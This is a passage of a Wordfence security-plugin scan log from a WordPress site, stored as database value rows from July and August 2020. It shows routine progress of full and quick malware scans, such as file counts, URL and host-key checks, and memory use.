(12515, 1595844279.692638, 2, 'info', 'Scanned contents of 182 additional files at 42.07 per second'),
(12516, 1595844280.700630, 2, 'info', 'Scanned contents of 233 additional files at 43.68 per second'),
(12517, 1595844281.706046, 2, 'info', 'Scanned contents of 285 additional files at 44.96 per second'),
(12518, 1595844282.709983, 2, 'info', 'Scanned contents of 342 additional files at 46.57 per second'),
(12519, 1595844283.713022, 2, 'info', 'Scanned contents of 397 additional files at 47.57 per second'),
(12520, 1595844284.714816, 2, 'info', 'Scanned contents of 453 additional files at 48.46 per second'),
(12521, 1595844285.716113, 2, 'info', 'Scanned contents of 503 additional files at 48.60 per second'),
(12522, 1595844286.722442, 2, 'info', 'Scanned contents of 529 additional files at 46.58 per second'),
(12523, 1595844287.725680, 2, 'info', 'Scanned contents of 585 additional files at 47.33 per second'),
(12524, 1595844288.727461, 2, 'info', 'Scanned contents of 628 additional files at 47.00 per second'),
(12525, 1595844289.743288, 2, 'info', 'Scanned contents of 672 additional files at 46.74 per second'),
(12526, 1595844290.745871, 2, 'info', 'Scanned contents of 724 additional files at 47.08 per second'),
(12527, 1595844291.780811, 2, 'info', 'Scanned contents of 742 additional files at 45.21 per second'),
(12528, 1595844292.786369, 2, 'info', 'Scanned contents of 787 additional files at 45.18 per second'),
(12529, 1595844293.956370, 2, 'info', 'Scanned contents of 825 additional files at 44.38 per second'),
(12530, 1595844295.060336, 2, 'info', 'Scanned contents of 873 additional files at 44.33 per second'),
(12531, 1595844296.068969, 2, 'info', 'Scanned contents of 919 additional files at 44.39 per second'),
(12532, 1595844297.159831, 2, 'info', 'Scanned contents of 967 additional files at 44.37 per second'),
(12533, 1595844298.172052, 2, 'info', 'Scanned contents of 1024 additional files at 44.90 per second'),
(12534, 1595844299.177991, 2, 'info', 'Scanned contents of 1086 additional files at 45.61 per second'),
(12535, 1595844300.181292, 2, 'info', 'Scanned contents of 1149 additional files at 46.30 per second'),
(12536, 1595844301.193239, 2, 'info', 'Scanned contents of 1205 additional files at 46.66 per second'),
(12537, 1595844302.250550, 2, 'info', 'Scanned contents of 1258 additional files at 46.79 per second'),
(12538, 1595844303.252875, 2, 'info', 'Scanned contents of 1309 additional files at 46.94 per second'),
(12539, 1595844304.281664, 2, 'info', 'Scanned contents of 1361 additional files at 47.07 per second'),
(12540, 1595844305.301224, 2, 'info', 'Scanned contents of 1391 additional files at 46.47 per second'),
(12541, 1595844306.322188, 2, 'info', 'Scanned contents of 1436 additional files at 46.39 per second'),
(12542, 1595844307.884293, 2, 'info', 'Scanned contents of 1460 additional files at 44.90 per second'),
(12543, 1595844308.885037, 2, 'info', 'Scanned contents of 1490 additional files at 44.45 per second'),
(12544, 1595844310.136324, 2, 'info', 'Scanned contents of 1529 additional files at 43.98 per second'),
(12545, 1595844311.387854, 2, 'info', 'Scanned contents of 1562 additional files at 43.36 per second'),
(12546, 1595844312.414099, 2, 'info', 'Scanned contents of 1601 additional files at 43.21 per second'),
(12547, 1595844313.461876, 2, 'info', 'Scanned contents of 1633 additional files at 42.87 per second'),
(12548, 1595844314.474995, 2, 'info', 'Scanned contents of 1674 additional files at 42.80 per second'),
(12549, 1595844315.546536, 2, 'info', 'Scanned contents of 1711 additional files at 42.58 per second'),
(12550, 1595844316.548843, 2, 'info', 'Scanned contents of 1750 additional files at 42.49 per second'),
(12551, 1595844317.557105, 2, 'info', 'Scanned contents of 1801 additional files at 42.69 per second'),
(12552, 1595844318.573126, 2, 'info', 'Scanned contents of 1845 additional files at 42.70 per second'),
(12553, 1595844319.576344, 2, 'info', 'Scanned contents of 1896 additional files at 42.89 per second'),
(12554, 1595844320.589093, 2, 'info', 'Scanned contents of 1947 additional files at 43.05 per second'),
(12555, 1595844321.625451, 2, 'info', 'Scanned contents of 1983 additional files at 42.87 per second'),
(12556, 1595844322.633550, 2, 'info', 'Scanned contents of 2013 additional files at 42.59 per second'),
(12557, 1595844323.900061, 2, 'info', 'Scanned contents of 2033 additional files at 41.89 per second'),
(12558, 1595844324.915423, 2, 'info', 'Scanned contents of 2068 additional files at 41.74 per second'),
(12559, 1595844325.952613, 2, 'info', 'Scanned contents of 2113 additional files at 41.77 per second'),
(12560, 1595844326.952809, 2, 'info', 'Scanned contents of 2167 additional files at 42.01 per second'),
(12561, 1595844327.986779, 2, 'info', 'Scanned contents of 2218 additional files at 42.15 per second'),
(12562, 1595844328.992437, 2, 'info', 'Scanned contents of 2246 additional files at 41.88 per second'),
(12563, 1595844330.519358, 2, 'info', 'Scanned contents of 2269 additional files at 41.14 per second'),
(12564, 1595844331.526260, 2, 'info', 'Scanned contents of 2314 additional files at 41.20 per second'),
(12565, 1595844332.529785, 2, 'info', 'Scanned contents of 2357 additional files at 41.23 per second'),
(12566, 1595844333.541283, 2, 'info', 'Scanned contents of 2384 additional files at 40.98 per second'),
(12567, 1595844334.620483, 2, 'info', 'Scanned contents of 2423 additional files at 40.89 per second'),
(12568, 1595844335.640644, 2, 'info', 'Scanned contents of 2463 additional files at 40.86 per second'),
(12569, 1595844336.675320, 2, 'info', 'Scanned contents of 2504 additional files at 40.84 per second'),
(12570, 1595844337.681497, 2, 'info', 'Scanned contents of 2534 additional files at 40.66 per second'),
(12571, 1595844338.706522, 2, 'info', 'Scanned contents of 2583 additional files at 40.78 per second'),
(12572, 1595844339.835016, 2, 'info', 'Scanned contents of 2600 additional files at 40.33 per second'),
(12573, 1595844340.843880, 2, 'info', 'Scanned contents of 2647 additional files at 40.43 per second'),
(12574, 1595844341.848310, 2, 'info', 'Scanned contents of 2691 additional files at 40.48 per second'),
(12575, 1595844342.848428, 2, 'info', 'Scanned contents of 2748 additional files at 40.72 per second'),
(12576, 1595844343.073920, 2, 'info', 'Scanned contents of 2763 additional files at 40.81 per second'),
(12577, 1595844343.074422, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(12578, 1595844343.085699, 2, 'info', 'Checking 1389 host keys against Wordfence scanning servers.'),
(12579, 1595844344.168737, 2, 'info', 'Done host key check.'),
(12580, 1595844344.181557, 2, 'info', 'Checking 3 URLs from 3 sources.'),
(12581, 1595844344.931045, 2, 'info', 'Done URL check.'),
(12582, 1595844344.941983, 2, 'info', 'Done file contents scan'),
(12588, 1595844345.024818, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(12589, 1595844345.025782, 2, 'info', 'Checking 4 host keys against Wordfence scanning servers.'),
(12590, 1595844345.761100, 2, 'info', 'Done host key check.'),
(12591, 1595844345.762173, 2, 'info', 'Done examining URLs'),
(12596, 1595844345.894569, 2, 'info', 'Starting password strength check on 1 users.'),
(12603, 1595844353.045932, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(12604, 1595844353.048725, 2, 'info', 'Done examining URLs'),
(12606, 1595844353.075364, 1, 'info', '-------------------'),
(12607, 1595844353.077723, 2, 'info', 'Wordfence used 12 MB of memory for scan. Server peak memory usage was: 26 MB'),
(12608, 1595844353.080321, 1, 'info', 'Scan Complete. Scanned 5130 files, 6 plugins, 2 themes, 20 posts, 0 comments and 2898 URLs in 2 minutes 48 seconds.'),
(12611, 1595857624.531571, 1, 'info', 'Initiating quick scan'),
(12616, 1595857624.638796, 1, 'info', '-------------------'),
(12617, 1595857624.644654, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(12618, 1595857624.645703, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(12621, 1595943736.119495, 1, 'info', 'Initiating quick scan'),
(12626, 1595943736.226363, 1, 'info', '-------------------'),
(12627, 1595943736.232548, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(12628, 1595943736.235033, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(12631, 1596030463.650790, 1, 'info', 'Initiating quick scan'),
(12636, 1596030463.805868, 1, 'info', '-------------------'),
(12637, 1596030463.817780, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(12638, 1596030463.852100, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(12640, 1596102875.633510, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 30th of July 2020 12:54:35 PM'),
(12642, 1596102882.083545, 1, 'info', 'Contacting Wordfence to initiate scan'),
(12649, 1596102893.017148, 2, 'info', 'Unable to access available disk space information'),
(12657, 1596102893.131964, 2, 'info', 'Getting plugin list from WordPress'),
(12658, 1596102893.139790, 2, 'info', 'Found 6 plugins'),
(12659, 1596102893.140445, 2, 'info', 'Getting theme list from WordPress'),
(12660, 1596102893.158266, 2, 'info', 'Found 2 themes'),
(12672, 1596102895.563414, 2, 'info', '500 files indexed'),
(12673, 1596102897.064844, 2, 'info', '1000 files indexed'),
(12674, 1596102897.516808, 2, 'info', '1500 files indexed'),
(12675, 1596102898.199756, 2, 'info', '2000 files indexed'),
(12676, 1596102898.438457, 2, 'info', '2500 files indexed'),
(12677, 1596102898.790378, 2, 'info', '3000 files indexed'),
(12678, 1596102899.337218, 2, 'info', '3500 files indexed'),
(12679, 1596102899.621371, 2, 'info', '4000 files indexed'),
(12680, 1596102900.035883, 2, 'info', '4022 files indexed'),
(12681, 1596102903.492543, 2, 'info', '4522 files indexed'),
(12682, 1596102903.714700, 2, 'info', '5022 files indexed'),
(12683, 1596102903.768968, 2, 'info', '5128 files indexed'),
(12684, 1596102905.434742, 2, 'info', 'Analyzed 100 files containing 1.45 MB of data so far'),
(12685, 1596102907.003526, 2, 'info', 'Analyzed 200 files containing 2.49 MB of data so far'),
(12686, 1596102908.487210, 2, 'info', 'Analyzed 300 files containing 3.82 MB of data so far'),
(12687, 1596102910.190125, 2, 'info', 'Analyzed 400 files containing 6.27 MB of data so far'),
(12688, 1596102911.676960, 2, 'info', 'Analyzed 500 files containing 7.07 MB of data so far'),
(12689, 1596102913.422492, 2, 'info', 'Analyzed 600 files containing 8.01 MB of data so far'),
(12690, 1596102914.927821, 2, 'info', 'Analyzed 700 files containing 9.86 MB of data so far'),
(12691, 1596102915.875443, 2, 'info', 'Analyzed 800 files containing 11.9 MB of data so far'),
(12692, 1596102918.312097, 2, 'info', 'Analyzed 900 files containing 14.46 MB of data so far'),
(12693, 1596102920.069337, 2, 'info', 'Analyzed 1000 files containing 17.32 MB of data so far'),
(12694, 1596102921.479918, 2, 'info', 'Analyzed 1100 files containing 17.65 MB of data so far'),
(12695, 1596102922.441376, 2, 'info', 'Analyzed 1200 files containing 18.23 MB of data so far'),
(12696, 1596102922.912838, 2, 'info', 'Analyzed 1300 files containing 18.52 MB of data so far'),
(12697, 1596102923.844482, 2, 'info', 'Analyzed 1400 files containing 19.48 MB of data so far'),
(12698, 1596102925.068666, 2, 'info', 'Analyzed 1500 files containing 19.7 MB of data so far'),
(12699, 1596102925.965126, 2, 'info', 'Analyzed 1600 files containing 20.68 MB of data so far'),
(12700, 1596102927.017302, 2, 'info', 'Analyzed 1700 files containing 23.37 MB of data so far'),
(12701, 1596102927.284439, 2, 'info', 'Analyzed 1800 files containing 23.4 MB of data so far'),
(12702, 1596102927.845905, 2, 'info', 'Analyzed 1900 files containing 23.43 MB of data so far'),
(12703, 1596102928.913864, 2, 'info', 'Analyzed 2000 files containing 23.8 MB of data so far'),
(12704, 1596102929.610758, 2, 'info', 'Analyzed 2100 files containing 24.55 MB of data so far'),
(12705, 1596102930.322429, 2, 'info', 'Analyzed 2200 files containing 25.27 MB of data so far'),
(12706, 1596102930.791023, 2, 'info', 'Analyzed 2300 files containing 25.91 MB of data so far'),
(12707, 1596102931.241900, 2, 'info', 'Analyzed 2400 files containing 25.94 MB of data so far'),
(12708, 1596102931.810908, 2, 'info', 'Analyzed 2500 files containing 25.97 MB of data so far'),
(12709, 1596102932.111727, 2, 'info', 'Analyzed 2600 files containing 25.99 MB of data so far'),
(12710, 1596102932.408245, 2, 'info', 'Analyzed 2700 files containing 26.02 MB of data so far'),
(12711, 1596102932.771457, 2, 'info', 'Analyzed 2800 files containing 26.06 MB of data so far'),
(12712, 1596102934.083125, 2, 'info', 'Analyzed 2900 files containing 26.08 MB of data so far'),
(12713, 1596102934.515929, 2, 'info', 'Analyzed 3000 files containing 27.33 MB of data so far'),
(12714, 1596102935.756503, 2, 'info', 'Analyzed 3100 files containing 28.29 MB of data so far'),
(12715, 1596102936.632960, 2, 'info', 'Analyzed 3200 files containing 29.98 MB of data so far'),
(12716, 1596102937.572224, 2, 'info', 'Analyzed 3300 files containing 35.44 MB of data so far'),
(12717, 1596102938.407161, 2, 'info', 'Analyzed 3400 files containing 37.16 MB of data so far'),
(12718, 1596102939.363860, 2, 'info', 'Analyzed 3500 files containing 37.98 MB of data so far'),
(12719, 1596102940.689539, 2, 'info', 'Analyzed 3600 files containing 39.01 MB of data so far'),
(12720, 1596102942.095929, 2, 'info', 'Analyzed 3700 files containing 41.64 MB of data so far'),
(12721, 1596102943.058633, 2, 'info', 'Analyzed 3800 files containing 43.39 MB of data so far'),
(12722, 1596102943.815104, 2, 'info', 'Analyzed 3900 files containing 43.76 MB of data so far'),
(12723, 1596102944.613344, 2, 'info', 'Analyzed 4000 files containing 45.13 MB of data so far'),
(12724, 1596102945.853576, 2, 'info', 'Analyzed 4100 files containing 48.58 MB of data so far'),
(12725, 1596102946.676560, 2, 'info', 'Analyzed 4200 files containing 50.11 MB of data so far'),
(12726, 1596102947.778148, 2, 'info', 'Analyzed 4300 files containing 52.17 MB of data so far'),
(12727, 1596102950.284495, 2, 'info', 'Analyzed 4400 files containing 54.33 MB of data so far'),
(12728, 1596102951.414208, 2, 'info', 'Analyzed 4500 files containing 55.59 MB of data so far'),
(12729, 1596102953.230881, 2, 'info', 'Analyzed 4600 files containing 64.48 MB of data so far'),
(12730, 1596102955.045420, 2, 'info', 'Analyzed 4700 files containing 67.86 MB of data so far'),
(12731, 1596102956.532526, 2, 'info', 'Analyzed 4800 files containing 70.33 MB of data so far'),
(12732, 1596102958.222192, 2, 'info', 'Analyzed 4900 files containing 72.93 MB of data so far'),
(12733, 1596102959.102670, 2, 'info', 'Analyzed 5000 files containing 75.89 MB of data so far'),
(12734, 1596102959.911196, 2, 'info', 'Analyzed 5100 files containing 77.42 MB of data so far'),
(12735, 1596102960.027319, 2, 'info', 'Analyzed 5128 files containing 77.81 MB of data.'),
(12743, 1596102962.238786, 2, 'info', 'Starting scan of file contents'),
(12744, 1596102963.271034, 2, 'info', 'Scanned contents of 42 additional files at 41.43 per second'),
(12745, 1596102964.288022, 2, 'info', 'Scanned contents of 97 additional files at 47.77 per second'),
(12746, 1596102965.815192, 2, 'info', 'Scanned contents of 133 additional files at 37.38 per second'),
(12747, 1596102966.825352, 2, 'info', 'Scanned contents of 169 additional files at 37.00 per second'),
(12748, 1596102967.845311, 2, 'info', 'Scanned contents of 190 additional files at 34.00 per second'),
(12749, 1596102968.857859, 2, 'info', 'Scanned contents of 231 additional files at 35.00 per second'),
(12750, 1596102970.113014, 2, 'info', 'Scanned contents of 260 additional files at 33.10 per second'),
(12751, 1596102971.113419, 2, 'info', 'Scanned contents of 302 additional files at 34.10 per second'),
(12752, 1596102972.115405, 2, 'info', 'Scanned contents of 340 additional files at 34.49 per second'),
(12753, 1596102973.126793, 2, 'info', 'Scanned contents of 377 additional files at 34.68 per second'),
(12754, 1596102974.131319, 2, 'info', 'Scanned contents of 412 additional files at 34.70 per second'),
(12755, 1596102975.143575, 2, 'info', 'Scanned contents of 465 additional files at 36.08 per second'),
(12756, 1596102976.146696, 2, 'info', 'Scanned contents of 502 additional files at 36.14 per second'),
(12757, 1596102977.163413, 2, 'info', 'Scanned contents of 523 additional files at 35.09 per second'),
(12758, 1596102978.163933, 2, 'info', 'Scanned contents of 580 additional files at 36.46 per second'),
(12759, 1596102979.244749, 2, 'info', 'Scanned contents of 618 additional files at 36.38 per second'),
(12760, 1596102980.277328, 2, 'info', 'Scanned contents of 678 additional files at 37.62 per second'),
(12761, 1596102981.769559, 2, 'info', 'Scanned contents of 727 additional files at 37.26 per second'),
(12762, 1596102982.773062, 2, 'info', 'Scanned contents of 772 additional files at 37.63 per second'),
(12763, 1596102983.782171, 2, 'info', 'Scanned contents of 822 additional files at 38.19 per second'),
(12764, 1596102984.785199, 2, 'info', 'Scanned contents of 860 additional files at 38.17 per second'),
(12765, 1596102985.996936, 2, 'info', 'Scanned contents of 907 additional files at 38.21 per second'),
(12766, 1596102987.014803, 2, 'info', 'Scanned contents of 945 additional files at 38.17 per second'),
(12767, 1596102988.043204, 2, 'info', 'Scanned contents of 987 additional files at 38.28 per second'),
(12768, 1596102989.056534, 2, 'info', 'Scanned contents of 1043 additional files at 38.92 per second'),
(12769, 1596102990.060482, 2, 'info', 'Scanned contents of 1099 additional files at 39.53 per second'),
(12770, 1596102991.065518, 2, 'info', 'Scanned contents of 1151 additional files at 39.95 per second'),
(12771, 1596102992.074762, 2, 'info', 'Scanned contents of 1191 additional files at 39.94 per second'),
(12772, 1596102993.075262, 2, 'info', 'Scanned contents of 1239 additional files at 40.20 per second'),
(12773, 1596102994.079380, 2, 'info', 'Scanned contents of 1293 additional files at 40.63 per second'),
(12774, 1596102995.093306, 2, 'info', 'Scanned contents of 1343 additional files at 40.90 per second'),
(12775, 1596102996.103576, 2, 'info', 'Scanned contents of 1377 additional files at 40.68 per second'),
(12776, 1596102997.905499, 2, 'info', 'Scanned contents of 1410 additional files at 39.55 per second'),
(12777, 1596102999.038196, 2, 'info', 'Scanned contents of 1445 additional files at 39.29 per second'),
(12778, 1596103000.099929, 2, 'info', 'Scanned contents of 1476 additional files at 39.00 per second'),
(12779, 1596103001.111374, 2, 'info', 'Scanned contents of 1514 additional files at 38.97 per second'),
(12780, 1596103002.180489, 2, 'info', 'Scanned contents of 1532 additional files at 38.37 per second'),
(12781, 1596103003.232110, 2, 'info', 'Scanned contents of 1561 additional files at 38.10 per second'),
(12782, 1596103004.237974, 2, 'info', 'Scanned contents of 1614 additional files at 38.45 per second'),
(12783, 1596103005.248721, 2, 'info', 'Scanned contents of 1664 additional files at 38.71 per second'),
(12784, 1596103006.305001, 2, 'info', 'Scanned contents of 1710 additional files at 38.82 per second'),
(12785, 1596103007.343690, 2, 'info', 'Scanned contents of 1746 additional files at 38.73 per second'),
(12786, 1596103008.344406, 2, 'info', 'Scanned contents of 1793 additional files at 38.90 per second'),
(12787, 1596103009.448256, 2, 'info', 'Scanned contents of 1833 additional files at 38.84 per second'),
(12788, 1596103010.455181, 2, 'info', 'Scanned contents of 1867 additional files at 38.74 per second'),
(12789, 1596103011.460407, 2, 'info', 'Scanned contents of 1920 additional files at 39.02 per second'),
(12790, 1596103012.500666, 2, 'info', 'Scanned contents of 1951 additional files at 38.83 per second'),
(12791, 1596103014.526059, 2, 'info', 'Scanned contents of 1964 additional files at 37.58 per second'),
(12792, 1596103015.996405, 2, 'info', 'Scanned contents of 1995 additional files at 37.12 per second'),
(12793, 1596103017.007139, 2, 'info', 'Scanned contents of 2043 additional files at 37.32 per second'),
(12794, 1596103018.043532, 2, 'info', 'Scanned contents of 2089 additional files at 37.45 per second'),
(12795, 1596103019.048650, 2, 'info', 'Scanned contents of 2129 additional files at 37.49 per second'),
(12796, 1596103020.048933, 2, 'info', 'Scanned contents of 2186 additional files at 37.83 per second'),
(12797, 1596103021.217019, 2, 'info', 'Scanned contents of 2231 additional files at 37.84 per second'),
(12798, 1596103023.017611, 2, 'info', 'Scanned contents of 2267 additional files at 37.31 per second'),
(12799, 1596103024.018351, 2, 'info', 'Scanned contents of 2305 additional files at 37.32 per second'),
(12800, 1596103025.023516, 2, 'info', 'Scanned contents of 2353 additional files at 37.49 per second'),
(12801, 1596103026.079871, 2, 'info', 'Scanned contents of 2377 additional files at 37.24 per second'),
(12802, 1596103027.080081, 2, 'info', 'Scanned contents of 2418 additional files at 37.30 per second'),
(12803, 1596103028.087973, 2, 'info', 'Scanned contents of 2457 additional files at 37.32 per second'),
(12804, 1596103029.095482, 2, 'info', 'Scanned contents of 2513 additional files at 37.60 per second'),
(12805, 1596103030.898440, 2, 'info', 'Scanned contents of 2545 additional files at 37.08 per second'),
(12806, 1596103031.899842, 2, 'info', 'Scanned contents of 2596 additional files at 37.28 per second'),
(12807, 1596103032.900974, 2, 'info', 'Scanned contents of 2659 additional files at 37.64 per second'),
(12808, 1596103033.913878, 2, 'info', 'Scanned contents of 2719 additional files at 37.94 per second'),
(12809, 1596103034.573920, 2, 'info', 'Scanned contents of 2761 additional files at 38.18 per second'),
(12810, 1596103034.574732, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(12811, 1596103034.590146, 2, 'info', 'Checking 1389 host keys against Wordfence scanning servers.'),
(12812, 1596103035.672795, 2, 'info', 'Done host key check.'),
(12813, 1596103035.680934, 2, 'info', 'Checking 3 URLs from 3 sources.'),
(12814, 1596103036.427237, 2, 'info', 'Done URL check.'),
(12815, 1596103036.439650, 2, 'info', 'Done file contents scan'),
(12821, 1596103036.607499, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(12822, 1596103036.608401, 2, 'info', 'Checking 4 host keys against Wordfence scanning servers.'),
(12823, 1596103037.354228, 2, 'info', 'Done host key check.'),
(12824, 1596103037.365419, 2, 'info', 'Done examining URLs'),
(12829, 1596103037.533332, 2, 'info', 'Starting password strength check on 1 users.'),
(12836, 1596103044.247100, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(12837, 1596103044.248393, 2, 'info', 'Done examining URLs'),
(12839, 1596103044.260026, 1, 'info', '-------------------'),
(12840, 1596103044.260827, 2, 'info', 'Wordfence used 12 MB of memory for scan. Server peak memory usage was: 26 MB'),
(12841, 1596103044.268930, 1, 'info', 'Scan Complete. Scanned 5128 files, 6 plugins, 2 themes, 20 posts, 0 comments and 2875 URLs in 2 minutes 40 seconds.'),
(12844, 1596116716.978075, 1, 'info', 'Initiating quick scan'),
(12849, 1596116717.033307, 1, 'info', '-------------------'),
(12850, 1596116717.034862, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(12851, 1596116717.035422, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(12854, 1596203663.772768, 1, 'info', 'Initiating quick scan'),
(12859, 1596203663.930427, 1, 'info', '-------------------'),
(12860, 1596203663.958004, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(12861, 1596203663.959381, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(12864, 1596289318.385031, 1, 'info', 'Initiating quick scan'),
(12869, 1596289318.552406, 1, 'info', '-------------------'),
(12870, 1596289318.553647, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(12871, 1596289318.585210, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(12873, 1596362220.578575, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 2nd of August 2020 12:57:00 PM'),
(12875, 1596362239.270878, 1, 'info', 'Contacting Wordfence to initiate scan'),
(12882, 1596362246.732439, 2, 'info', 'Unable to access available disk space information'),
(12890, 1596362246.829346, 2, 'info', 'Getting plugin list from WordPress'),
(12891, 1596362246.847050, 2, 'info', 'Found 6 plugins'),
(12892, 1596362246.848340, 2, 'info', 'Getting theme list from WordPress'),
(12893, 1596362246.878132, 2, 'info', 'Found 2 themes'),
(12905, 1596362249.175391, 2, 'info', '500 files indexed'),
(12906, 1596362250.754809, 2, 'info', '1000 files indexed'),
(12907, 1596362251.031678, 2, 'info', '1500 files indexed'),
(12908, 1596362251.560167, 2, 'info', '2000 files indexed'),
(12909, 1596362251.818090, 2, 'info', '2500 files indexed'),
(12910, 1596362252.165464, 2, 'info', '3000 files indexed'),
(12911, 1596362252.801249, 2, 'info', '3500 files indexed'),
(12912, 1596362253.121572, 2, 'info', '4000 files indexed'),
(12913, 1596362253.968575, 2, 'info', '4500 files indexed'),
(12914, 1596362254.162850, 2, 'info', '5000 files indexed'),
(12915, 1596362254.222691, 2, 'info', '5127 files indexed'),
(12916, 1596362255.695541, 2, 'info', 'Analyzed 100 files containing 1.45 MB of data so far'),
(12917, 1596362257.886435, 2, 'info', 'Analyzed 200 files containing 2.49 MB of data so far'),
(12918, 1596362258.882563, 2, 'info', 'Analyzed 300 files containing 3.82 MB of data so far'),
(12919, 1596362260.022011, 2, 'info', 'Analyzed 400 files containing 6.27 MB of data so far'),
(12920, 1596362261.095574, 2, 'info', 'Analyzed 500 files containing 7.07 MB of data so far'),
(12921, 1596362262.082466, 2, 'info', 'Analyzed 600 files containing 7.94 MB of data so far'),
(12922, 1596362262.800117, 2, 'info', 'Analyzed 700 files containing 9.77 MB of data so far'),
(12923, 1596362263.403860, 2, 'info', 'Analyzed 800 files containing 11.81 MB of data so far'),
(12924, 1596362264.435942, 2, 'info', 'Analyzed 900 files containing 14.37 MB of data so far'),
(12925, 1596362265.680928, 2, 'info', 'Analyzed 1000 files containing 17.24 MB of data so far'),
(12926, 1596362266.746543, 2, 'info', 'Analyzed 1100 files containing 17.71 MB of data so far'),
(12927, 1596362267.435527, 2, 'info', 'Analyzed 1200 files containing 18.15 MB of data so far'),
(12928, 1596362268.311851, 2, 'info', 'Analyzed 1300 files containing 18.44 MB of data so far'),
(12929, 1596362269.131756, 2, 'info', 'Analyzed 1400 files containing 19.39 MB of data so far'),
(12930, 1596362270.090895, 2, 'info', 'Analyzed 1500 files containing 19.61 MB of data so far'),
(12931, 1596362270.624393, 2, 'info', 'Analyzed 1600 files containing 20.66 MB of data so far'),
(12932, 1596362271.322409, 2, 'info', 'Analyzed 1700 files containing 23.28 MB of data so far'),
(12933, 1596362271.577854, 2, 'info', 'Analyzed 1800 files containing 23.31 MB of data so far'),
(12934, 1596362271.984286, 2, 'info', 'Analyzed 1900 files containing 23.34 MB of data so far'),
(12935, 1596362273.960483, 2, 'info', 'Analyzed 2000 files containing 23.72 MB of data so far'),
(12936, 1596362274.738113, 2, 'info', 'Analyzed 2100 files containing 24.47 MB of data so far'),
(12937, 1596362275.367156, 2, 'info', 'Analyzed 2200 files containing 25.18 MB of data so far'),
(12938, 1596362275.625283, 2, 'info', 'Analyzed 2300 files containing 25.82 MB of data so far'),
(12939, 1596362276.000369, 2, 'info', 'Analyzed 2400 files containing 25.85 MB of data so far'),
(12940, 1596362276.266448, 2, 'info', 'Analyzed 2500 files containing 25.88 MB of data so far'),
(12941, 1596362276.613116, 2, 'info', 'Analyzed 2600 files containing 25.9 MB of data so far'),
(12942, 1596362276.960559, 2, 'info', 'Analyzed 2700 files containing 25.94 MB of data so far'),
(12943, 1596362277.378502, 2, 'info', 'Analyzed 2800 files containing 25.97 MB of data so far'),
(12944, 1596362277.682376, 2, 'info', 'Analyzed 2900 files containing 26 MB of data so far'),
(12945, 1596362278.135663, 2, 'info', 'Analyzed 3000 files containing 27.24 MB of data so far'),
(12946, 1596362279.449473, 2, 'info', 'Analyzed 3100 files containing 28.21 MB of data so far'),
(12947, 1596362280.493420, 2, 'info', 'Analyzed 3200 files containing 29.91 MB of data so far'),
(12948, 1596362281.646379, 2, 'info', 'Analyzed 3300 files containing 35.41 MB of data so far'),
(12949, 1596362282.838774, 2, 'info', 'Analyzed 3400 files containing 37.07 MB of data so far'),
(12950, 1596362283.796493, 2, 'info', 'Analyzed 3500 files containing 37.92 MB of data so far'),
(12951, 1596362284.882716, 2, 'info', 'Analyzed 3600 files containing 38.92 MB of data so far'),
(12952, 1596362286.136607, 2, 'info', 'Analyzed 3700 files containing 41.56 MB of data so far'),
(12953, 1596362286.898356, 2, 'info', 'Analyzed 3800 files containing 43.31 MB of data so far'),
(12954, 1596362287.303199, 2, 'info', 'Analyzed 3900 files containing 43.68 MB of data so far'),
(12955, 1596362287.806026, 2, 'info', 'Analyzed 4000 files containing 45.05 MB of data so far'),
(12956, 1596362288.802424, 2, 'info', 'Analyzed 4100 files containing 48.45 MB of data so far'),
(12957, 1596362290.832733, 2, 'info', 'Analyzed 4200 files containing 49.98 MB of data so far'),
(12958, 1596362292.323939, 2, 'info', 'Analyzed 4300 files containing 52.08 MB of data so far'),
(12959, 1596362294.031788, 2, 'info', 'Analyzed 4400 files containing 54.21 MB of data so far'),
(12960, 1596362295.075669, 2, 'info', 'Analyzed 4500 files containing 55.46 MB of data so far'),
(12961, 1596362296.912313, 2, 'info', 'Analyzed 4600 files containing 64.39 MB of data so far'),
(12962, 1596362298.615531, 2, 'info', 'Analyzed 4700 files containing 67.74 MB of data so far'),
(12963, 1596362300.092369, 2, 'info', 'Analyzed 4800 files containing 70.23 MB of data so far'),
(12964, 1596362301.336023, 2, 'info', 'Analyzed 4900 files containing 72.8 MB of data so far'),
(12965, 1596362302.689668, 2, 'info', 'Analyzed 5000 files containing 75.76 MB of data so far'),
(12966, 1596362303.851104, 2, 'info', 'Analyzed 5100 files containing 77.29 MB of data so far'),
(12967, 1596362304.072449, 2, 'info', 'Analyzed 5127 files containing 77.68 MB of data.'),
(12975, 1596362306.192450, 2, 'info', 'Starting scan of file contents'),
(12976, 1596362308.020647, 2, 'info', 'Scanned contents of 36 additional files at 35.01 per second'),
(12977, 1596362309.005570, 2, 'info', 'Scanned contents of 94 additional files at 46.69 per second'),
(12978, 1596362310.017460, 2, 'info', 'Scanned contents of 148 additional files at 48.92 per second'),
(12979, 1596362311.318092, 2, 'info', 'Scanned contents of 182 additional files at 42.07 per second'),
(12980, 1596362312.324263, 2, 'info', 'Scanned contents of 230 additional files at 43.14 per second'),
(12981, 1596362313.325873, 2, 'info', 'Scanned contents of 286 additional files at 45.16 per second'),
(12982, 1596362314.341865, 2, 'info', 'Scanned contents of 335 additional files at 45.58 per second'),
(12983, 1596362315.355872, 2, 'info', 'Scanned contents of 388 additional files at 46.39 per second'),
